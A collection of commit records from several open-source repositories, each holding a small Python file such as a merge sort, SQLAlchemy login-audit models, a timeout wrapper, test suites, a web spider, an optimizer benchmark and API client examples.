elif len(my_buffer[year]) > 10000:
flush(my_buffer, targets, year)
my_buffer[year].append(line)
for year in targets:
flush(my_buffer, targets, year)
targets[year].close()
| mit | Python |
|
8832a542405a1999c296cc8b55d454b8cf35b5ea | Add merge.py | bluedai180/PythonExercise,bluedai180/PythonExercise | algorithms/merge.py | algorithms/merge.py | import sys
sys.setrecursionlimit(1000000)
class Merge:
def merge_sort(self, lists):
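        # recursively split the list in half, sort each half, then merge them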
if len(lists) <= 1:
return lists
num = len(lists) // 2
left = self.merge_sort(lists[:num])
right = self.merge_sort(lists[num:])
return self.merge(left, right)
def merge(self, left, right):
i, j = 0, 0
result = []
while i < len(left) and j < len(right):
if left[i] <= right[j]:
result.append(left[i])
i += 1
else:
result.append(right[j])
j += 1
result += left[i:]
result += right[j:]
return result
if __name__ == "__main__":
s = [3, 4, 1, 6, 2, 9, 7, 0, 8, 5]
merge = Merge()
print(merge.merge_sort(s))
| apache-2.0 | Python |
|
85b518638e990cb7be298ea4b533aa465dd681b5 | Add models to store data in... | GuardedRisk/Google-Apps-Auditing | acctwatch/models.py | acctwatch/models.py | from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import (
scoped_session,
sessionmaker,
relationship,
)
DBSession = scoped_session(sessionmaker())
Base = declarative_base()
class LoginItem(Base):
__table__ = Table('login_item', Base.metadata,
Column('id', Integer, primary_key=True, unique=True, autoincrement=True),
Column('guid', String, index=True),
Column('time', DateTime(timezone=True)),
Column('success', Boolean, default=False, nullable=False),
Column('failure', String, nullable=True),
Column('ip', String, nullable=False),
)
actor = relationship("Actor", backref="logins", secondary="actor_logins")
location = relationship("Location", backref="logins", secondary="login_locations")
class ActorLogins(Base):
__table__ = Table('actor_logins', Base.metadata,
Column('lid', Integer, ForeignKey('login_item.id', onupdate="CASCADE", ondelete="RESTRICT"), nullable=False),
Column('aid', String, ForeignKey('actor.id', onupdate="CASCADE", ondelete="RESTRICT"), nullable=False),
PrimaryKeyConstraint('lid', 'aid'),
)
class Actor(Base):
__table__ = Table('actor', Base.metadata,
Column('id', String, primary_key=True, unique=True),
Column('email', String),
)
class Location(Base):
__table__ = Table('location', Base.metadata,
Column('id', Integer, primary_key=True, unique=True),
Column('location', String(), unique=True, index=True)
)
class LoginLocation(Base):
__table__ = Table('login_locations', Base.metadata,
Column('loc_id', Integer, ForeignKey('location.id', onupdate="CASCADE", ondelete="RESTRICT"), nullable=False),
Column('login_id', Integer, ForeignKey('login_item.id', onupdate="CASCADE", ondelete="RESTRICT"), nullable=False),
PrimaryKeyConstraint('loc_id', 'login_id'),
)
| isc | Python |
|
42e88bc8e6d81916164e8e0fe6b8b6c476567526 | add script to integrate disambiguated results | funginstitute/patentprocessor,yngcan/patentprocessor,funginstitute/patentprocessor,nikken1/patentprocessor,nikken1/patentprocessor,nikken1/patentprocessor,funginstitute/patentprocessor,yngcan/patentprocessor,yngcan/patentprocessor | integrate.py | integrate.py | #!/usr/bin/env python
"""
Takes in a CSV file that represents the output of the disambiguation engine:
Patent Number, Firstname, Lastname, Unique_Inventor_ID
Groups by Unique_Inventor_ID and then inserts them into the Inventor table using
lib.alchemy.match
"""
import sys
import lib.alchemy as alchemy
from lib.util.csv_reader import read_file
from lib.handlers.xml_util import normalize_document_identifier
from collections import defaultdict
import cPickle as pickle
def integrate(filename):
blocks = defaultdict(list)
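    # group the raw inventor records by their disambiguated inventor id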
for line in read_file(filename):
patent_number, name_first, name_last, unique_inventor_id = line
patent_number = normalize_document_identifier(patent_number)
rawinventors = alchemy.session.query(alchemy.RawInventor).filter_by(
patent_id = patent_number,
name_first = name_first,
name_last = name_last).all()
blocks[unique_inventor_id].extend(rawinventors)
pickle.dump(blocks, open('integrate.db', 'wb'))
for block in blocks.itervalues():
alchemy.match(block)
def main():
if len(sys.argv) <= 1:
print 'USAGE: python integrate.py <path-to-csv-file>'
sys.exit()
filename = sys.argv[1]
integrate(filename)
if __name__ == '__main__':
main()
| bsd-2-clause | Python |
|
80ecafd51cf258880bb5b1e183d5dd166c2d18fc | Add lockrun.py | kmalov/lockrun | lockrun.py | lockrun.py | import optparse
import signal
import threading
import syslog
import time
import os
import re
def find_process(first_pid, process):
# Find a process in /proc
process = re.sub(" +", " ", process).strip()
m = re.compile("^[0-9]+$")
all_proc = [ x for x in os.listdir("/proc") if m.search(x)]
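    # start scanning from the parent's position in the listing (this assumes
    # the /proc enumeration order places the child after its parent)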
for p in all_proc[all_proc.index(str(first_pid)):]:
try:
with open("/proc/%s/cmdline" % p, "r") as f:
cmdline = f.readline().replace("\x00", " ").rstrip('\n').strip()
if process == cmdline:
return int(p)
except IOError:
pass
return False
def process_watcher(child_process, parent_pid, timeout):
child_pid = find_process(parent_pid, child_process)
if child_pid:
syslog.syslog(syslog.LOG_WARNING,
"""Trying to kill process "%s"[%s] by timeout(%ss)"""
% (child_process, child_pid, timeout))
os.kill(child_pid, signal.SIGTERM)
else:
syslog.syslog(syslog.LOG_WARNING,
"""Can't find task process "%s" in /proc""" % child_process)
if __name__ == "__main__":
op = optparse.OptionParser()
op.add_option("-P", "--program", dest="program", default=False, type="string")
op.add_option("-p", "--lockfile", dest="lockfile", default=False, type="string")
op.add_option("-t", "--timeout", dest="timeout", default=False, type="int")
opts, args = op.parse_args()
if opts.timeout:
watcher = threading.Timer(opts.timeout, process_watcher, [opts.program, os.getpid(), opts.timeout])
watcher.start()
# Run program
start_time = time.time()
return_code = os.system(opts.program)
    total_time = time.time() - start_time
if opts.timeout:
watcher.cancel()
syslog.syslog(syslog.LOG_NOTICE,
"""Command "%s" is done with return code: %s. Execution time %.2fs""" % (opts.program, return_code, total_tile))
| mit | Python |
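A usage sketch matching the option parser above (command and timeout values are hypothetical); if the wrapped command outlives the timeout, the watcher thread looks it up in /proc and sends SIGTERM:

# $ python lockrun.py -P "sleep 60" -t 10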
|
1551cb57ab21364a4e96fa109786ccb0a4ccc3a0 | Create MergeCSVs.py | berteh/ScribusGenerator | utils/MergeCSVs.py | utils/MergeCSVs.py | # merge all columns of the csv file in current directory into a single 'merge.csv' file.
# requires pandas librairy to be installed.
# you can customize the merge in many ways: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.concat.html
import pandas as pd
import glob
dfs = glob.glob('*.csv')
result = pd.concat([pd.read_csv(df, sep=';') for df in dfs], ignore_index=True)
result.to_csv('merge.csv')
| mit | Python |
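If a side-by-side merge of columns is wanted instead of stacked rows, pandas can also concatenate along the column axis; a sketch assuming the files share a common row order:

import glob
import pandas as pd

dfs = glob.glob('*.csv')
# axis=1 places the files' columns next to each other instead of appending rows
result = pd.concat([pd.read_csv(df, sep=';') for df in dfs], axis=1)
result.to_csv('merge_columns.csv', index=False)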
|
9b6c1af3420653124495103169865036df4f7705 | Add logging module for Pyro-related debugging | opensistemas-hub/osbrain | osbrain/logging.py | osbrain/logging.py | import os
os.environ["PYRO_LOGFILE"] = "pyro_osbrain.log"
os.environ["PYRO_LOGLEVEL"] = "DEBUG"
| apache-2.0 | Python |
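Pyro4 initializes its configuration from PYRO_-prefixed environment variables at import time, so this module only has an effect if it runs before any Pyro4 import; a usage sketch:

import osbrain.logging  # sets PYRO_LOGFILE / PYRO_LOGLEVEL first
import Pyro4            # picks the values up while initializing its config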
|
bb188bcc196b12842378aa1c0c535800717a6b61 | add example to extract word frequencies | codeforfrankfurt/PolBotCheck,codeforfrankfurt/PolBotCheck,codeforfrankfurt/PolBotCheck,codeforfrankfurt/PolBotCheck | polbotcheck/word_frequencies.py | polbotcheck/word_frequencies.py | import nltk
from nltk.corpus import stopwords
def get_word_frequencies(text, words_n=10, lang='german'):
default_stopwords = set(nltk.corpus.stopwords.words(lang))
words = nltk.tokenize.word_tokenize(text)
words = [word for word in words if len(word) > 1]
words = [word for word in words if not word.isnumeric()]
words = [word.lower() for word in words]
words = [word for word in words if word not in default_stopwords]
fdist = nltk.FreqDist(words)
for word, frequency in fdist.most_common(words_n):
print(u'{}:{}'.format(word, frequency))
return fdist.most_common(words_n)
if __name__ == "__main__":
text = 'Die offene Gesellschaft ist ein in der Tradition des Liberalismus stehendes Gesellschaftsmodell Karl Poppers, das zum Ziel hat, „die kritischen Fähigkeiten des Menschen“ freizusetzen. Die Gewalt des Staates soll dabei so weit wie möglich geteilt werden, um Machtmissbrauch zu verhindern. Poppers Vorstellung von der offenen Gesellschaft ist eng mit der Staatsform der Demokratie verbunden, allerdings nicht verstanden als Herrschaft der Mehrheit, sondern als die Möglichkeit, die Regierung gewaltfrei abzuwählen. Der offenen Gesellschaft steht einerseits die Laissez-Faire-Gesellschaft gegenüber, andererseits die totalitäre, am holistisch-kollektivistischen Denken ausgerichtete „geschlossene Gesellschaft“, die Popper auch ironisch den „Himmel auf Erden“ nennt, weil sie als solcher propagiert wird.'
get_word_frequencies(text)
| mit | Python |
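The tokenizer model and stop-word lists are separate NLTK data packages and must be fetched once before the first run; a setup sketch:

import nltk

nltk.download('punkt')      # required by nltk.tokenize.word_tokenize
nltk.download('stopwords')  # required for the per-language stop-word lists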
|
1281d0e298d5b68f55e5c290e145ec0255552d7a | add tests | Arvedui/i3pystatus,enkore/i3pystatus,yang-ling/i3pystatus,schroeji/i3pystatus,m45t3r/i3pystatus,teto/i3pystatus,schroeji/i3pystatus,m45t3r/i3pystatus,fmarchenko/i3pystatus,richese/i3pystatus,drwahl/i3pystatus,teto/i3pystatus,richese/i3pystatus,Arvedui/i3pystatus,facetoe/i3pystatus,ncoop/i3pystatus,ncoop/i3pystatus,enkore/i3pystatus,facetoe/i3pystatus,yang-ling/i3pystatus,drwahl/i3pystatus,fmarchenko/i3pystatus | tests/test_backlight.py | tests/test_backlight.py | import i3pystatus.backlight as backlight
import os
import pytest
from contextlib import contextmanager
from operator import itemgetter
from tempfile import TemporaryDirectory
@contextmanager
def setattr_temporarily(obj, attr, value):
old_value = getattr(obj, attr)
setattr(obj, attr, value)
yield
setattr(obj, attr, old_value)
@pytest.mark.parametrize("backlights_data", [
[],
[("acpi_video0", 0, 255)],
[("acpi_video0", 86, 171)],
[("acpi_video0", 255, 255)],
[("intel_backlight", 0, 7)],
[("intel_backlight", 15, 33)],
[("intel_backlight", 79, 255)],
[("acpi_video0", 0, 50), ("intel_backlight", 44, 60)],
[("acpi_video0", 100, 100), ("intel_backlight", 187, 255)],
[("intel_backlight", 87, 88), ("acpi_video0", 150, 150)],
[("intel_backlight", 237, 237), ("acpi_video0", 1, 2)],
])
@pytest.mark.parametrize("format", [
None, "{brightness}/{max_brightness} ({percentage}%)"
])
@pytest.mark.parametrize("format_no_backlight", [
None, "({percentage}% -- {brightness}) [{max_brightness}]"
])
def test_backlight(backlights_data, format, format_no_backlight):
print(backlight.Backlight.base_path)
with TemporaryDirectory() as tmp_dirname:
for (backlight_name, brightness, max_brightness) in backlights_data:
backlight_dirname = tmp_dirname + "/" + backlight_name
os.mkdir(backlight_dirname)
with open(backlight_dirname + "/brightness", "w") as f:
print(brightness, file=f)
with open(backlight_dirname + "/max_brightness", "w") as f:
print(max_brightness, file=f)
if not format:
format = backlight.Backlight.format
if not format_no_backlight:
format_no_backlight = backlight.Backlight.format_no_backlight
if not format_no_backlight:
format_no_backlight = format
with setattr_temporarily(backlight.Backlight, 'base_path', tmp_dirname + "/{backlight}/"):
i3backlight = backlight.Backlight(
format=format,
format_no_backlight=format_no_backlight)
i3backlight.run()
if len(backlights_data) == 0:
used_format = format_no_backlight
cdict = {
"brightness": -1,
"max_brightness": -1,
"percentage": -1
}
else:
backlights_data = sorted(backlights_data, key=itemgetter(0))
(_, brightness, max_brightness) = backlights_data[0]
used_format = format
cdict = {
"brightness": brightness,
"max_brightness": max_brightness,
"percentage": round((brightness / max_brightness) * 100)
}
assert i3backlight.output["full_text"] == used_format.format(**cdict)
| mit | Python |
|
20ecbf00c05d1f959e78cbf87cf459fd46dea59f | Create pythonhelloworld.py | nashme818/commandlinearlington | pythonhelloworld.py | pythonhelloworld.py | print "hello world"
| unlicense | Python |
|
99a63431e441a1c52d3f16f6faf0594497755d45 | add a new special case install_zstack. It only installs zstack and initalize database, but not do any real cloud deployment | zstackorg/zstack-woodpecker,zstackio/zstack-woodpecker,zstackio/zstack-woodpecker,zstackorg/zstack-woodpecker,SoftwareKing/zstack-woodpecker,SoftwareKing/zstack-woodpecker,zstackio/zstack-woodpecker,quarkonics/zstack-woodpecker,zstackorg/zstack-woodpecker,quarkonics/zstack-woodpecker | integrationtest/vm/basic/install_zstack.py | integrationtest/vm/basic/install_zstack.py | '''
@author: Youyk
'''
import os
import zstackwoodpecker.setup_actions as setup_actions
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_util as test_util
USER_PATH = os.path.expanduser('~')
EXTRA_SUITE_SETUP_SCRIPT = '%s/.zstackwoodpecker/extra_suite_setup_config.sh' % USER_PATH
def test():
setup = setup_actions.SetupAction()
setup.plan = test_lib.all_config
setup.run()
if os.path.exists(EXTRA_SUITE_SETUP_SCRIPT):
os.system("bash %s" % EXTRA_SUITE_SETUP_SCRIPT)
test_util.test_pass('ZStack Installation Success')
| apache-2.0 | Python |
|
c6ded12845f25e305789840e1687bfee83e82be5 | Add a few simple pytest tests | zachpanz88/mlbgame,panzarino/mlbgame | tests/test_standings.py | tests/test_standings.py | #!/usr/bin/env python
import pytest
from datetime import datetime
from mlbgame import standings
date = datetime(2017, 5, 15, 19, 4, 59, 367187)
s = standings.Standings(date)
def test_standings_url():
standings_url = 'http://mlb.mlb.com/lookup/json/named.standings_schedule_date.bam?season=2017&' \
'schedule_game_date.game_date=%272017/05/15%27&sit_code=%27h0%27&league_id=103&' \
'league_id=104&all_star_sw=%27N%27&version=2'
assert s.standings_url == standings_url
def test_historical_standings_url():
date = datetime(2016, 5, 15)
s = standings.Standings(date)
standings_url = 'http://mlb.mlb.com/lookup/json/named.historical_standings_schedule_date.bam?season=2016&' \
'game_date=%272016/05/15%27&sit_code=%27h0%27&league_id=103&league_id=104&' \
'all_star_sw=%27N%27&version=48'
assert s.standings_url == standings_url
def test_divisions_is_list():
assert type(s.divisions) is list
| mit | Python |
|
5f5c98df4349fb31f0311b1fb7f0e6b9092b4b59 | add API example | live4thee/zstack-utility,ghxandsky/zstack-utility,mrwangxc/zstack-utility,mrwangxc/zstack-utility,ghxandsky/zstack-utility,zstackorg/zstack-utility,mrwangxc/zstack-utility,mingjian2049/zstack-utility,mingjian2049/zstack-utility,zstackorg/zstack-utility,zstackio/zstack-utility,mingjian2049/zstack-utility,zstackio/zstack-utility,zstackorg/zstack-utility,zstackio/zstack-utility,ghxandsky/zstack-utility,live4thee/zstack-utility,live4thee/zstack-utility | apibinding/examples/example.py | apibinding/examples/example.py | import httplib
import json
import time
# return a dict containing API return value
def api_call(session_uuid, api_id, api_content):
conn = httplib.HTTPConnection("localhost", 8080)
headers = {"Content-Type": "application/json"}
if session_uuid:
api_content["session"] = {"uuid": session_uuid}
api_body = {api_id: api_content}
conn.request("POST", "/zstack/api", json.dumps(api_body))
response = conn.getresponse()
if response.status != 200:
raise Exception("failed to make an API call, %s, %s" % (response.status, response.reason))
rsp_body = response.read()
rsp = json.loads(rsp_body)
if rsp["state"] == "Done":
return json.loads(rsp["result"])
job_uuid = rsp["uuid"]
def query_until_done():
conn.request("GET", "/zstack/api/result/%s" % job_uuid)
response = conn.getresponse()
if response.status != 200:
raise Exception("failed to query API result, %s, %s" % (response.status, response.reason))
rsp_body = response.read()
rsp = json.loads(rsp_body)
if rsp["state"] == "Done":
return json.loads(rsp["result"])
time.sleep(1)
print "Job[uuid:%s] is still in processing" % job_uuid
return query_until_done()
return query_until_done()
def error_if_fail(rsp):
success = rsp.values()[0]["success"]
if not success:
error = rsp.values()[0]["error"]
raise Exception("failed to login, %s" % json.dumps(error))
def login():
content = {
"accountName": "admin",
"password": "b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86"
}
rsp = api_call(None, "org.zstack.header.identity.APILogInByAccountMsg", content)
error_if_fail(rsp)
session_uuid = rsp.values()[0]["inventory"]["uuid"]
print "successfully login, session uuid is: %s" % session_uuid
return session_uuid
def create_zone(session_uuid):
content = {"name": "zone1"}
rsp = api_call(session_uuid, "org.zstack.header.zone.APICreateZoneMsg", content)
error_if_fail(rsp)
print "successfully created zone1"
def logout(session_uuid):
content = {"sessionUuid": session_uuid}
rsp = api_call(None, "org.zstack.header.identity.APILogOutMsg", content)
error_if_fail(rsp)
print "successfully logout"
session_uuid = login()
create_zone(session_uuid)
logout(session_uuid)
| apache-2.0 | Python |
|
01ee5e64093bfd6f6c57c27d189408f2f765f2b4 | Create load_from_numpy.py | guillitte/pytorch-sentiment-neuron | load_from_numpy.py | load_from_numpy.py | import os
import torch
from torch.autograd import Variable
from torch import optim
import torch.nn.functional as F
import torch.nn as nn
import numpy as np
import models
import argparse
import time
import math
parser = argparse.ArgumentParser(description='load_from_numpy.py')
parser.add_argument('-save_model', default='mlstm-ns.pt',
help="""Model filename to save""")
parser.add_argument('-load_model', default='',
help="""Model filename to load""")
parser.add_argument('-train', default='data/input.txt',
help="""Text filename for training""")
parser.add_argument('-valid', default='data/valid.txt',
help="""Text filename for validation""")
parser.add_argument('-rnn_type', default='mlstm',
help='mlstm, lstm or gru')
parser.add_argument('-layers', type=int, default=1,
help='Number of layers in the encoder/decoder')
parser.add_argument('-rnn_size', type=int, default=4096,
help='Size of hidden states')
parser.add_argument('-embed_size', type=int, default=128,
help='Size of embeddings')
parser.add_argument('-seq_length', type=int, default=20,
help="Maximum sequence length")
parser.add_argument('-batch_size', type=int, default=64,
help='Maximum batch size')
parser.add_argument('-learning_rate', type=float, default=0.001,
help="""Starting learning rate.""")
parser.add_argument('-dropout', type=float, default=0.0,
help='Dropout probability.')
parser.add_argument('-param_init', type=float, default=0.05,
help="""Parameters are initialized over uniform distribution
with support (-param_init, param_init)""")
parser.add_argument('-clip', type=float, default=5,
help="""Clip gradients at this value.""")
parser.add_argument('--seed', type=int, default=1234,
help='random seed')
# GPU
parser.add_argument('-cuda', action='store_true',
help="Use CUDA")
opt = parser.parse_args()
embed = nn.Embedding(256, opt.embed_size)
rnn = models.StackedLSTM(models.mLSTM, opt.layers, opt.embed_size, opt.rnn_size, 256, opt.dropout)
embed.weight.data = torch.from_numpy(np.load("weights/embd.npy"))
rnn.h2o.weight.data = torch.from_numpy(np.load("weights/w.npy")).t()
rnn.h2o.bias.data = torch.from_numpy(np.load("weights/b.npy"))
rnn.layers[0].wx.weight.data = torch.from_numpy(np.load("weights/wx.npy")).t()
rnn.layers[0].wh.weight.data = torch.from_numpy(np.load("weights/wh.npy")).t()
rnn.layers[0].wh.bias.data = torch.from_numpy(np.load("weights/b0.npy"))
rnn.layers[0].wmx.weight.data = torch.from_numpy(np.load("weights/wmx.npy")).t()
rnn.layers[0].wmh.weight.data = torch.from_numpy(np.load("weights/wmh.npy")).t()
checkpoint = {
'rnn': rnn,
'embed': embed,
'opt': opt,
'epoch': 0
}
save_file = opt.save_model
print('Saving to '+ save_file)
torch.save(checkpoint, save_file)
| mit | Python |
|
03123c64835f0a1d4cb16cbc638a432b99cc9d04 | Add a test case for #605 - the issue has been fixed by #606 | slackhq/python-slackclient,slackapi/python-slackclient,slackapi/python-slackclient,slackapi/python-slackclient | integration_tests/rtm/test_issue_605.py | integration_tests/rtm/test_issue_605.py | import asyncio
import collections
import logging
import os
import threading
import time
import unittest
import pytest
from integration_tests.env_variable_names import SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN, \
SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID
from slack import RTMClient, WebClient
class TestRTMClient_Issue_605(unittest.TestCase):
"""Runs integration tests with real Slack API
https://github.com/slackapi/python-slackclient/issues/605
"""
def setUp(self):
self.logger = logging.getLogger(__name__)
self.bot_token = os.environ[SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN]
self.channel_id = os.environ[SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID]
self.rtm_client = RTMClient(token=self.bot_token, run_async=False)
def tearDown(self):
# Reset the decorators by @RTMClient.run_on
RTMClient._callbacks = collections.defaultdict(list)
@pytest.mark.skip()
def test_issue_605(self):
self.text = "This message was sent to verify issue #605"
self.called = False
@RTMClient.run_on(event="message")
def process_messages(**payload):
self.logger.info(payload)
self.called = True
def connect():
self.logger.debug("Starting RTM Client...")
self.rtm_client.start()
t = threading.Thread(target=connect)
t.setDaemon(True)
try:
t.start()
self.assertFalse(self.called)
time.sleep(3)
self.web_client = WebClient(
token=self.bot_token,
run_async=False,
loop=asyncio.new_event_loop(), # TODO: this doesn't work without this
)
new_message = self.web_client.chat_postMessage(channel=self.channel_id, text=self.text)
self.assertFalse("error" in new_message)
time.sleep(5)
self.assertTrue(self.called)
finally:
t.join(.3)
# --- a/slack/rtm/client.py
# +++ b/slack/rtm/client.py
# @@ -10,7 +10,6 @@ import inspect
# import signal
# from typing import Optional, Callable, DefaultDict
# from ssl import SSLContext
# -from threading import current_thread, main_thread
#
# # ThirdParty Imports
# import asyncio
# @@ -186,7 +185,8 @@ class RTMClient(object):
# SlackApiError: Unable to retrieve RTM URL from Slack.
# """
# # TODO: Add Windows support for graceful shutdowns.
# - if os.name != "nt" and current_thread() == main_thread():
# + # if os.name != "nt" and current_thread() == main_thread():
# + if os.name != "nt":
# signals = (signal.SIGHUP, signal.SIGTERM, signal.SIGINT)
# for s in signals:
# self._event_loop.add_signal_handler(s, self.stop)
# Exception in thread Thread-1:
# Traceback (most recent call last):
# File "/path-to-python/asyncio/unix_events.py", line 95, in add_signal_handler
# signal.set_wakeup_fd(self._csock.fileno())
# ValueError: set_wakeup_fd only works in main thread
#
# During handling of the above exception, another exception occurred:
#
# Traceback (most recent call last):
# File "/path-to-python/threading.py", line 932, in _bootstrap_inner
# self.run()
# File "/path-to-python/threading.py", line 870, in run
# self._target(*self._args, **self._kwargs)
# File "/path-to-project/python-slackclient/integration_tests/rtm/test_issue_605.py", line 29, in connect
# self.rtm_client.start()
# File "/path-to-project/python-slackclient/slack/rtm/client.py", line 192, in start
# self._event_loop.add_signal_handler(s, self.stop)
# File "/path-to-python/asyncio/unix_events.py", line 97, in add_signal_handler
# raise RuntimeError(str(exc))
# RuntimeError: set_wakeup_fd only works in main thread
| mit | Python |
|
66d3d329674521c8756a8644f2f0a58824a1ec41 | add spider for ups freight | iandees/all-the-places,iandees/all-the-places,iandees/all-the-places | locations/spiders/ups_freight_service_centers.py | locations/spiders/ups_freight_service_centers.py | # -*- coding: utf-8 -*-
import re
import scrapy
from locations.items import GeojsonPointItem
class UPSFreightServiceCenter(scrapy.Spider):
download_delay = 0.2
name = "ups_freight_service_centers"
allowed_domains = ["upsfreight.com"]
start_urls = (
'https://www.upsfreight.com/ProductsandServices/ServiceCenterDir/default.aspx',
)
def parse_location(self, response):
ref = re.search(r'.+/(.+)', response.url).group(1)
properties = {
'addr_full': response.xpath('//span[contains(@id, "Address")]/text()').extract()[0],
'city': response.xpath('//span[contains(@id, "Zip")]/text()').extract()[0].split(',')[0],
'state': response.xpath('//span[contains(@id, "Zip")]/text()').extract()[0].split(', ')[1].split(' ')[0],
'postcode': response.xpath('//span[contains(@id, "Zip")]/text()').extract()[0].split(', ')[1].split(' ')[1],
'ref': ref,
'website': response.url,
'phone': response.xpath('//span[contains(@id, "Telephone")]/text()').extract()[0],
'name': response.xpath('//span[contains(@id, "lName")]/text()').extract()[0],
'country': ref.split('qcountry=')[1].split('&svc')[0]
}
yield GeojsonPointItem(**properties)
def parse_state(self, response):
location_urls = response.xpath('//*[@id="app_ctl00_scTable_hlDetail"]/@href').extract()
for url in location_urls:
yield scrapy.Request(response.urljoin(url), callback=self.parse_location)
def parse(self, response):
urls = response.xpath('//table//table//table//table//table//a/@href').extract()
for url in urls:
yield scrapy.Request(response.urljoin(url), callback=self.parse_state)
| mit | Python |
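An assumed invocation from the project root, using the spider name defined above (the output flag is optional):

# $ scrapy crawl ups_freight_service_centers -o ups_freight_service_centers.geojson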
|
9311d3d4acd8c67c20d76cc74d00e0f5a83318e6 | add product-of-array-except-self | zeyuanxy/leet-code,EdisonAlgorithms/LeetCode,zeyuanxy/leet-code,zeyuanxy/leet-code,EdisonAlgorithms/LeetCode,EdisonAlgorithms/LeetCode | vol5/product-of-array-except-self/product-of-array-except-self.py | vol5/product-of-array-except-self/product-of-array-except-self.py | class Solution(object):
def productExceptSelf(self, nums):
"""
:type nums: List[int]
:rtype: List[int]
"""
n = len(nums)
ret = [1] * n
product = 1
for i in range(n):
ret[i] = product
product *= nums[i]
product = 1
for i in range(n - 1, -1, -1):
ret[i] *= product
product *= nums[i]
        return ret
| mit | Python |
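A quick check of the two-pass prefix/suffix-product approach above:

# For [1, 2, 3, 4] the answer is [2*3*4, 1*3*4, 1*2*4, 1*2*3].
assert Solution().productExceptSelf([1, 2, 3, 4]) == [24, 12, 8, 6]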
|
2c1e5286eca392854bf311e01d1131c45167973f | add coco benchmarking | mehdidc/fluentopt,mehdidc/fluentopt | benchmarks/coco.py | benchmarks/coco.py | """
This benchmark example uses the coco benchmark set of functions
(<http://coco.gforge.inria.fr/>, <https://github.com/numbbo/coco>)
to compare optimizers provided by fluentopt between themselves and also
with CMA-ES[1].
To run these benchmarks, the package 'cocoex' must be installed,
check <https://github.com/numbbo/coco> to see how to install it.
Also, the package 'cma' is needed and can be installed by pip.
For each function, each algorithm is run for several independent trials
and the results are all written in a csv file (by default benchmark.csv).
each row correspond to a trial for a given algo and function.
The columns are:
- 'func' : function name (str)
- 'algo' : algo name (str)
- 'nbeval' : nb of evaluations performed (int)
- 'ybest' : the best output value found (float)
- 'duration' : duration in seconds (float)
[1] Nikolaus Hansen and Andreas Ostermeier, Completely derandomized
self-adaptation in evolution strategies.
Evolutionary computation, 9(2):159–195, 2001
"""
import time
import numpy as np
import pandas as pd
from cocoex import Suite, Observer
from fluentopt import Bandit
from fluentopt.bandit import ucb_minimize
from fluentopt.transformers import Wrapper
from fluentopt import RandomSearch
from cma import fmin as cma_fmin
from cma import CMAEvolutionStrategy
from clize import run
def cma(fun, budget):
sigma0 = 0.02
range_ = fun.upper_bounds - fun.lower_bounds
center = fun.lower_bounds + range_ / 2
x0 = center
options = dict(
scaling=range_/range_[0],
maxfevals=budget,
verb_log=0,
verb_disp=1,
verbose=1)
es = CMAEvolutionStrategy(x0, sigma0 * range_[0], options)
res = es.optimize(fun).result()
xbest, ybest, nbeval, *rest = res
return xbest, ybest, nbeval
def ucb(fun, budget):
sampler = _uniform_sampler(low=fun.lower_bounds, high=fun.upper_bounds)
opt = Bandit(sampler=sampler, score=ucb_minimize, nb_suggestions=100)
return _run_opt(opt, fun, budget)
def random_search(fun, budget):
sampler = _uniform_sampler(low=fun.lower_bounds, high=fun.upper_bounds)
opt = RandomSearch(sampler=sampler)
return _run_opt(opt, fun, budget)
def _uniform_sampler(low, high):
low = np.array(low)
high = np.array(high)
dim = len(low)
def sampler_(rng):
return rng.uniform(0, 1, size=dim) * (high - low) + low
return sampler_
def _run_opt(opt, feval, budget):
for _ in range(budget):
x = opt.suggest()
y = feval(x)
opt.update(x=x, y=y)
idx = np.argmin(opt.output_history_)
xbest = opt.input_history_[idx]
ybest = opt.output_history_[idx]
nbeval = budget
return xbest, ybest, nbeval
def main(nb_trials=15, budget_per_dim=100, output='benchmark.csv'):
suite_instance = "year:2016"
suite_name = "bbob"
suite_options = ""
suite = Suite(suite_name, suite_instance, suite_options)
algos = [random_search, cma, ucb]
stats = []
for i, fun in enumerate(suite):
print('Function {}'.format(fun.name))
for algo in algos:
algo_name = algo.__name__
print('Algo : "{}"'.format(algo_name))
for trial in range(nb_trials):
print('Running trial {}...'.format(trial + 1))
t0 = time.time()
xbest, ybest, nbeval = algo(fun, budget_per_dim * fun.dimension)
delta_t = time.time() - t0
stats.append({
'func': fun.id,
'algo': algo_name,
'nbeval': nbeval,
'ybest': ybest,
'duration': delta_t
})
stats = pd.DataFrame(stats)
stats.to_csv(output, index=False)
if __name__ == '__main__':
run(main)
| bsd-3-clause | Python |
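A usage sketch with hypothetical values; main() can be called directly from Python, or through the clize-generated command line that mirrors its signature:

# main(nb_trials=5, budget_per_dim=50, output='smoke_test.csv')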
|
6ae6544cca07e857d680d199b2c2f436cb1d9a82 | add wordpress stats | JulienLeonard/socialstats | wordpress_stats.py | wordpress_stats.py | from utils import *
import urllib, json
import time
import datetime
def dump(blogid,filepath):
posts = []
offset = 0
while True:
puts("offset",offset)
url = "https://public-api.wordpress.com/rest/v1/sites/" + blogid + "/posts?number=100&offset=" + str(offset)
response = urllib.urlopen(url);
data = json.loads(response.read())
for post in data['posts']:
posts.append(post)
if len(data['posts']) < 100:
break
offset += 100
output=open(filepath, 'w+')
content = "<wordpress nfollowers=\"" + "NA" + "\" timestamp=\"" + str(time.time()) + "\">\n"
for post in posts:
puts(post['title'],post['like_count'],post['date'])
content = content + "\t<post name=\"" + post['title'] + "\" \t timestamp=\"" + str(post['date']) + "\" \t fav_count=\"" + str(post['like_count']) + "\"></post>\n"
content = content + "</wordpress>\n"
output.write(content.encode('utf8'))
output.close()
# example (placeholder blog id): dump("yourblog.wordpress.com", "wordpressexample.xml")
| mit | Python |
|
